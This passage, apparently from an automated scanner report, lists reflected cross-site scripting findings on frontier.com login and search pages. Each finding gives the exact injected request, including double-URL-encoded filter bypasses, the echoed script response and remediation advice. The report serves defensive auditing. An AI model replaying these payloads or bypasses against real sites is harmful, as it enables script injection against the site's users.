The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4f61%2527%253balert%25281%2529%252f%252f5fb1c88860b was submitted in the REST URL parameter 2. This input was echoed as a4f61';alert(1)//5fb1c88860b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /yahoo/fpsearchlg.aspa4f61%2527%253balert%25281%2529%252f%252f5fb1c88860b?type=biz HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:31:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43727


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/yahoo/fpsearchlg.aspa4f61';alert(1)//5fb1c88860b?type=biz');//]]>
...[SNIP]...

2.90. http://www.frontier.com/yahoo/fy_excl2.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.frontier.com
Path:   /yahoo/fy_excl2.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69d70'%3b8506878fe2 was submitted in the REST URL parameter 1. This input was echoed as 69d70';8506878fe2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /yahoo69d70'%3b8506878fe2/fy_excl2.aspx HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; s_sq=%5B%5BB%5D%5D

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:31:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43315


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?aspxerrorpath=/yahoo69d70';8506878fe2/fy_excl2.aspx');//]]>
...[SNIP]...

2.91. http://www.frontier.com/yahoo/fy_excl2.aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /yahoo/fy_excl2.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 747f9%2527%253balert%25281%2529%252f%252fcb0ef15e2ce was submitted in the REST URL parameter 2. This input was echoed as 747f9';alert(1)//cb0ef15e2ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /yahoo/fy_excl2.aspx747f9%2527%253balert%25281%2529%252f%252fcb0ef15e2ce HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:32:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43633


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/yahoo/fy_excl2.aspx747f9';alert(1)//cb0ef15e2ce');//]]>
...[SNIP]...

2.92. https://www.frontier.com/AgentOrdering/Login/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /AgentOrdering/Login/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7dcc6'%3balert(1)//b78c0a9a96c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7dcc6';alert(1)//b78c0a9a96c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AgentOrdering/Login/?7dcc6'%3balert(1)//b78c0a9a96c=1 HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; s_sq=cznfrontier%3D%2526pid%253DFrontier.com%252520%25253A%2525202011%252520Commercial%252520Summer%252520Offer%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ffrontier.com%25252FAgentOrdering%25252FLogin%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48631


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('https://www.frontier.com/AgentOrdering/Login/Default.aspx?7dcc6';alert(1)//b78c0a9a96c=1');
var Page_ValidationActive = false;
if (typeof(ValidatorOnLoad) == "function") {
ValidatorOnLoad();
}

function ValidatorOnSubmit() {
if (Page_ValidationActive) {
return Va
...[SNIP]...

2.93. https://www.frontier.com/AgentOrdering/Login/Default.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /AgentOrdering/Login/Default.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf4af'-alert(1)-'9ff1a208c26e1167f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AgentOrderingcf4af'-alert(1)-'9ff1a208c26e1167f/Login/Default.aspx?__LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=...[SNIP]...&hfPageType=1&hfRecord_Type=Category&ctl00%24ctl00%24FOBasePH%24ContentPH%24txtUsername=&ctl00%24ctl00%24FOBasePH%24ContentPH%24txtPassword=&ctl00%24ctl00%24FOBasePH%24ContentPH%24btnLogin=%C2%BB+Log+In+&phoneNumA=&phoneNumB=&phoneNumC=&zipCode= HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: https://www.frontier.com/AgentOrdering/Login/
Cache-Control: max-age=0
Origin: https://www.frontier.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; CP=null*; s_cc=true; s_sq=cznfrontier%3D%2526pid%253DAgentOrdering%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522ctl00%252524ct%2526oidt%253D2%2526ot%253DSUBMIT

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43516


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('https://www.frontier.com/PageNotFound.aspx?aspxerrorpath=/AgentOrderingcf4af'-alert(1)-'9ff1a208c26e1167f/Login/Default.aspx');//]]>
...[SNIP]...

2.94. https://www.frontier.com/AgentOrdering/Login/Default.aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /AgentOrdering/Login/Default.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2920'-alert(1)-'00fe8bd6112a72257 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AgentOrdering/Logind2920'-alert(1)-'00fe8bd6112a72257/Default.aspx?__LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=...[SNIP]...
0aG91dCBzdWJtaXR0aW5nIHBob25lL3ppcC0tPgo8ZGl2IGlkPSJvdmVybGF5Rm9ybSIgY2xhc3M9Im92ZXJsYXkiPgogICAgPGltZyBhbHQ9IiIgc3JjPSIvaW1hZ2VzL0ZUUk1haW4vZ3JhZGllbnRCb3gucG5nIiBoZWlnaHQ9IjI2MyIgd2lkdGg9IjY0MCI%2BCiAgICA8ZGl2IGNsYXNzPSJvdmVybGF5SW5uZXIiPgogICAgICAgIDxhIGhyZWY9IiMiIGNsYXNzPSJjbG9zZU92ZXJsYXkiPkNMT1NFPC9hPgogICAgICAgIDxoMT5IZWxsbyE8L2gxPgogICAgICAgIDxwPlRvIHByb3ZpZGUgeW91IHdpdGggcHJvZHVjdHMgYW5kIHNlcnZpY2VzIHRoYXQgYmVzdCBtZWV0IHlvdXIgbmVlZHMsIHdlIG5lZWQgdG8ga25vdyB5b3VyIGxvY2F0aW9uLiBUaGlzIGluZm9ybWF0aW9uIGlzIGtlcHQgcHJpdmF0ZSE8L3A%2BCiAgICAgICAgPGZvcm0gbmFtZT0iZkZvcm0yIiBhY3Rpb249IiMiIG1ldGhvZD0icG9zdCI%2BCiAgICAgICAgICAgIDxkaXYgaWQ9ImVycm9yRmllbGQyIiBjbGFzcz0ib3ZlcmxheUVycm9yIj5QbGVhc2UgZW50ZXIgYSB2YWxpZCBwaG9uZSBudW1iZXIgb3IgemlwIGNvZGUuPC9kaXY%2BCiAgICAgICAgICAgIDxkaXYgY2xhc3M9InBob25lTGluZSI%2BCiAgICAgICAgICAgICAgICA8bGFiZWwgZm9yPSJwaG9uZSI%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%2BCiAgICAgICAgICAgICAgICAgICAgPC9kaXY%2BCiAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgPC9kaXY%2BCiAgICAgICAgICAgIDxkaXYgY2xhc3M9InppcExpbmUiPgogICAgICAgICAgICAgICAgPGxhYmVsPm9yIFppcCBDb2RlPC9sYWJlbD4KICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9InppcEZpZWxkIj48aW5wdXQgbWF4bGVuZ3RoPSI1IiBuYW1lPSJ6aXBDb2RlIiB2YWx1ZT0iIiBpZD0iemlwSW5wdXQyIiBjbGFzcz0iZGVwdGhJbnB1dCB6aXAiIHR5cGU9InRleHQiPjwvZGl2PgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgPGRpdiBjbGFzcz0ic3VibWl0TGluZSI%2BPGlucHV0IGlkPSJvdmVybGF5U3VibWl0Q2hhbmdlIiB2YWx1ZT0iIiB0eXBlPSJzdWJtaXQiPjwvZGl2PgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJjaGVja0xpbmUiPgogICAgICAgICAgICAgICAgPGlucHV0IG5hbWU9Im5ld2JpZSIgdHlwZT0iY2hlY2tib3giPgogICAgICAgICAgICAgICAgPGxhYmVsIGlkPSJuZXdiVGV4dCIgZm9yPSJuZXdiaWUiPkNoZWNrIGhlcmUgaWYgeW91IGFyZSBhIG5ldyBjdXN0b21lci48L2xhYmVsPgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L2Zvcm0%2BCiAgICA8L2Rpdj4KPC9kaXY%2BCmRkCei%2FS%2FmrhIn%2FFNx89jqMRuohsfs%3D&hfPageType=1&hfRecord_Type=Category&ctl00%24ctl00%24FOBasePH%24ContentPH%24txtUsername=&ctl00%24ctl00%24FOBasePH%24ContentPH%24txtPassword=&ctl00%24ctl00%24FOBasePH%24ContentPH%2
4btnLogin=%C2%BB+Log+In+&phoneNumA=&phoneNumB=&phoneNumC=&zipCode= HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: https://www.frontier.com/AgentOrdering/Login/
Cache-Control: max-age=0
Origin: https://www.frontier.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; CP=null*; s_cc=true; s_sq=cznfrontier%3D%2526pid%253DAgentOrdering%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522ctl00%252524ct%2526oidt%253D2%2526ot%253DSUBMIT

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43516


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('https://www.frontier.com/PageNotFound.aspx?aspxerrorpath=/AgentOrdering/Logind2920'-alert(1)-'00fe8bd6112a72257/Default.aspx');//]]>
...[SNIP]...

2.95. https://www.frontier.com/BillPay/Login.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /BillPay/Login.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2cd8c'-alert(1)-'1c3c38ca197 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /BillPay2cd8c'-alert(1)-'1c3c38ca197/Login.aspx HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; s_sq=%5B%5BB%5D%5D

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43362


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('https://www.frontier.com/PageNotFound.aspx?aspxerrorpath=/BillPay2cd8c'-alert(1)-'1c3c38ca197/Login.aspx');//]]>
...[SNIP]...

2.96. https://www.frontier.com/BillPay/Login.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /BillPay/Login.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a67f'%3balert(1)//b430a9201a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3a67f';alert(1)//b430a9201a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /BillPay/Login.aspx?3a67f'%3balert(1)//b430a9201a2=1 HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 60490


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('https://www.frontier.com/BillPay/Login.aspx?3a67f';alert(1)//b430a9201a2=1');
var Page_ValidationActive = false;
if (typeof(ValidatorOnLoad) == "function") {
ValidatorOnLoad();
}

function ValidatorOnSubmit() {
if (Page_ValidationActive) {
return Va
...[SNIP]...

2.97. https://www.frontier.com/Controls/VirtualCode.ashx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /Controls/VirtualCode.ashx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc153'-alert(1)-'4c0b46131a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Controlsbc153'-alert(1)-'4c0b46131a0/VirtualCode.ashx?pageid=97&origPath=%2fNewStyleSheet.css%2f HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: https://www.frontier.com/AgentOrdering/Login/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; s_sq=cznfrontier%3D%2526pid%253DFrontier.com%252520%25253A%2525202011%252520Commercial%252520Summer%252520Offer%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ffrontier.com%25252FAgentOrdering%25252FLogin%25252F%2526ot%253DA

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43410


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('https://www.frontier.com/PageNotFound.aspx?aspxerrorpath=/Controlsbc153'-alert(1)-'4c0b46131a0/VirtualCode.ashx');//]]>
...[SNIP]...

2.98. https://www.frontier.com/Controls/VirtualCode.ashx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /Controls/VirtualCode.ashx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f651%2527%253balert%25281%2529%252f%252f40ebae18800 was submitted in the REST URL parameter 2. This input was echoed as 7f651';alert(1)//40ebae18800 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Controls/VirtualCode.ashx7f651%2527%253balert%25281%2529%252f%252f40ebae18800?pageid=97&origPath=%2fNewStyleSheet.css%2f HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: https://www.frontier.com/AgentOrdering/Login/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; s_sq=cznfrontier%3D%2526pid%253DFrontier.com%252520%25253A%2525202011%252520Commercial%252520Summer%252520Offer%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ffrontier.com%25252FAgentOrdering%25252FLogin%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44040


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('https://www.frontier.com/PageNotFound.aspx?404;https://www.frontier.com:443/Controls/VirtualCode.ashx7f651';alert(1)//40ebae18800?pageid=97&origPath=/NewStyleSheet.css/');//]]>
...[SNIP]...

2.99. https://www.frontier.com/Shop/Login.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /Shop/Login.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 293ac'-alert(1)-'b884da74b02dcdeaf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

